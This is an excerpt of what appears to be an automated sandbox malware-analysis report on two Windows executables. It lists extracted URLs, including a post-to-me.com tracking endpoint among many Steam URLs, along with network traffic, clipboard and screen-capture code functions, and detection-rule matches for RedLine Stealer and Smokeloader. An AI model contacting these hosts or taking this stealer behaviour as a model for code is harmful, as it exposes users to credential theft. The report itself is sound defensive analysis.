    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
    Source: E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: lBb4XI4eGD.exe, 00000000.00000002.3954535854.0000000000800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
    Source: lBb4XI4eGD.exe, 00000000.00000002.3954535854.0000000000800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/2U
    Source: lBb4XI4eGD.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
    Source: lBb4XI4eGD.exe, 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
    Source: lBb4XI4eGD.exe, 00000000.00000002.3954535854.0000000000800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000659000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997243319009
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000687000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shopbb
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000687000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49709 version: TLS 1.2
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02141942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02141942
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,3_2_00436980

    System Summary

    barindex
    Source: 00000003.00000002.1651009881.0000000000602000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.3954477135.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02142357 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02142357
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_021425FB NtdllDefWindowProc_W,PostQuitMessage,0_2_021425FB
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004280120_2_00428012
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004071A10_2_004071A1
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004373C90_2_004373C9
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004274740_2_00427474
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0042D4DE0_2_0042D4DE
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004285500_2_00428550
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0043D6680_2_0043D668
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0041669F0_2_0041669F
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004137150_2_00413715
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004277E60_2_004277E6
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0040E96A0_2_0040E96A
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0042EAD00_2_0042EAD0
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00427A900_2_00427A90
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00418A9F0_2_00418A9F
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00436CAF0_2_00436CAF
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00427D570_2_00427D57
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00413EFB0_2_00413EFB
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_021682790_2_02168279
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0216ED370_2_0216ED37
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_021541620_2_02154162
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_021676DB0_2_021676DB
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0216D7450_2_0216D745
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_021687B70_2_021687B7
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02167A4D0_2_02167A4D
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0214EBD10_2_0214EBD1
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_021569060_2_02156906
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0215397C0_2_0215397C
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02176F160_2_02176F16
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02167FBE0_2_02167FBE
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02167CF70_2_02167CF7
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02158D060_2_02158D06
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0216ED370_2_0216ED37
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004088803_2_00408880
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0040B2B03_2_0040B2B0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004198403_2_00419840
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004068503_2_00406850
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004278603_2_00427860
